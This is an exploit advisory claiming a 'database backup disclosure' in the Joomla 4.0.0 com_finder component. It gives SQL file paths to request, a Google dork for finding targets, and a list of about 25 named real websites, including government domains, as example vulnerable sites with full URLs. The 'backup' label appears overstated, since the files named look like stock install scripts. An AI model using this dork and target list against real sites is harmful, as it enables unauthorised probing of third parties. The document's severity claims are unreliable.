Joomla Com_Finder component version 4.0.0 suffers from a database disclosure vulnerability.
186354a6e3d9e945ec6f0d231330bbcf#################################################################################################
# Exploit Title : Joomla Com_Finder Components 4.0.0 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 02/12/2018
# Vendor Homepage : joomla.org
# Software Download Links :
github.com/joomla/40-backend-template/tree/master/administrator/components/com_finder/sql
github.com/joomla/joomla-cms/archive/4.0.0-alpha1.zip
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 4.0
# Google Dorks : inurl:''/administrator/components/com_finder/''
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110189
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2259
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31521
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/administrator
# Exploit :
/administrator/components/com_finder/sql/install.mysql.sql
/administrator/components/com_finder/sql/install.postgresql.sql
/administrator/components/com_finder/sql/uninstall.mysql.sql
/administrator/components/com_finder/sql/uninstall.postgresql.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] library.franklincountyva.gov/administrator/components/com_finder/sql/install.mysql.sql
[+] freightdb.kzntransport.gov.za/administrator/components/com_finder/sql/install.mysql.sql
[+] operaciavianocnedieta.sk/administrator/components/com_finder/sql/install.mysql.sql
[+] mvapower.com/MVASITE/administrator/components/com_finder/sql/install.mysql.sql
[+] kkn.cz/gdpr/administrator/components/com_finder/sql/install.mysql.sql
[+] labarjaque.com/administrator/components/com_finder/sql/install.mysql.sql
[+] elmwoodnebraska.com/nl/administrator/components/com_finder/sql/install.mysql.sql
[+] comesa.int/2016/administrator/components/com_finder/sql/install.mysql.sql
[+] xpilot-ai.org/administrator/components/com_finder/sql/install.mysql.sql
[+] pad.ribble-consultants.co.uk/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] njebertappraisals.com/administrator/components/com_finder/sql/install.mysql.sql
[+] villaalena.cz/administrator/components/com_finder/sql/install.mysql.sql
[+] cosemsmg.org.br/site/administrator/components/com_finder/sql/install.mysql.sql
[+] isleofwightdiscos.co.uk/administrator/components/com_finder/sql/install.mysql.sql
[+] tgr.org.hk/administrator/components/com_finder/sql/install.mysql.sql
[+] recursosvirtualesperu.com/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] asbsteel.com/site/administrator/components/com_finder/sql/install.mysql.sql
[+] brisbug.asn.au/administrator/components/com_finder/sql/install.mysql.sql
[+] djabugay.org.au/Joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] stoneandequipment.com/panama/administrator/components/com_finder/sql/install.mysql.sql
[+] vente-ordi.com/administrator/components/com_finder/sql/install.mysql.sql
[+] huili.fi/administrator/components/com_finder/sql/install.mysql.sql
[+] jbyouth.net/joomla/administrator/components/com_finder/sql/install.mysql.sql
[+] bristolacneremoval.co.uk/administrator/components/com_finder/sql/install.mysql.sql
[+] utilsoluciones.com/en/administrator/components/com_finder/sql/install.mysql.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################